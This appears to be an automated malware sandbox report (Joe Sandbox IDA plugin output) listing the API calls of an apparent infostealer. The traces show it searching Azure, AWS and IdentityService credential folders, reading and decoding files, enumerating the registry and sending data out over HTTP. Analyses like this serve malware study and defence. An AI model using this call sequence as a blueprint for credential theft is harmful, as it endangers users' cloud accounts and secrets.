                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00405A13
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02D4AF60,00000000,?,02D14D78,00000000,?,00421A1C), ref: 00405E71
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                  • HttpOpenRequestA.WININET(00000000,02D4AF90,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 1406981993-2180234286
                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                  APIs
                                                  • memset.MSVCRT ref: 00414D87
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • memset.MSVCRT ref: 00414E13
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  • memset.MSVCRT ref: 00414E9F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02D4AE80,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                  • memset.MSVCRT ref: 00414F2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                  • API String ID: 4017274736-156832076
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0D1EA
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02F0D32E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F0D335
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D46F
                                                  • lstrcat.KERNEL32(?,00421478), ref: 02F0D47E
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D491
                                                  • lstrcat.KERNEL32(?,0042147C), ref: 02F0D4A0
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4B3
                                                  • lstrcat.KERNEL32(?,00421480), ref: 02F0D4C2
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4D5
                                                  • lstrcat.KERNEL32(?,00421484), ref: 02F0D4E4
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4F7
                                                  • lstrcat.KERNEL32(?,00421488), ref: 02F0D506
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D519
                                                  • lstrcat.KERNEL32(?,0042148C), ref: 02F0D528
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D53B
                                                  • lstrcat.KERNEL32(?,00421490), ref: 02F0D54A
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                  • lstrlen.KERNEL32(?), ref: 02F0D591
                                                  • lstrlen.KERNEL32(?), ref: 02F0D5A0
                                                  • memset.MSVCRT ref: 02F0D5EF
                                                    • Part of subcall function 02F1ACD7: StrCmpCA.SHLWAPI(0064A350,02F0AA0E,?,02F0AA0E,0064A350), ref: 02F1ACF6
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0D61B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 1973479514-0
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                  • lstrcatA.KERNEL32(?,00000000,02D45C60,00421474,02D45C60,00421470,00000000), ref: 0040D208
                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                  • memset.MSVCRT ref: 0040D388
                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 2775534915-0
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02F05C5F
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F05C7A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F05DFA
                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 02F060D8
                                                  • lstrlen.KERNEL32(00000000), ref: 02F060E9
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F060FA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F06101
                                                  • lstrlen.KERNEL32(00000000), ref: 02F06116
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 02F0612D
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0613F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02F06158
                                                  • memcpy.MSVCRT(?), ref: 02F06165
                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 02F06182
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02F06196
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02F061B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06217
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06224
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F05E5F
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0622E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                  • String ID:
                                                  • API String ID: 1703137719-0
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 02F0CCD3
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02F0CCF0
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 02F0CCFC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F0CD0F
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 02F0CD1C
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02F0CD40
                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 02F0CD5E
                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 02F0CD85
                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 02F0CF09
                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 02F0CF20
                                                    • Part of subcall function 02F0CA87: memset.MSVCRT ref: 02F0CABA
                                                    • Part of subcall function 02F0CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02F0CAD8
                                                    • Part of subcall function 02F0CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02F0CAE3
                                                    • Part of subcall function 02F0CA87: memcpy.MSVCRT(?,?,?), ref: 02F0CB79
                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 02F0CFC1
                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 02F0CFD8
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B46), ref: 02F0CBAA
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B47), ref: 02F0CBBE
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B4E), ref: 02F0CBDF
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D0AB
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F0D103
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02D48F48,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                  • StrStrA.SHLWAPI(?,02D48F60,00420B52), ref: 0040CAF7
                                                  • StrStrA.SHLWAPI(00000000,02D490C8), ref: 0040CB1E
                                                  • StrStrA.SHLWAPI(?,02D49BF0,00000000,?,00421458,00000000,?,00000000,00000000,?,02D45BC0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                  • StrStrA.SHLWAPI(00000000,02D49CF0), ref: 0040CCB9
                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D45CF0), ref: 0040C871
                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • StrStrA.SHLWAPI(?,02D49CF0,00000000,?,0042145C,00000000,?,00000000,02D45CF0), ref: 0040CD5A
                                                  • StrStrA.SHLWAPI(00000000,02D45970), ref: 0040CD71
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • RegOpenKeyExA.ADVAPI32(00000000,02D47090,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                  • String ID: - $%s\%s$?
                                                  • API String ID: 3246050789-3278919252
                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memset.MSVCRT ref: 00410C1C
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                  • memset.MSVCRT ref: 00410CCD
                                                  • memset.MSVCRT ref: 00410CE1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                  Strings
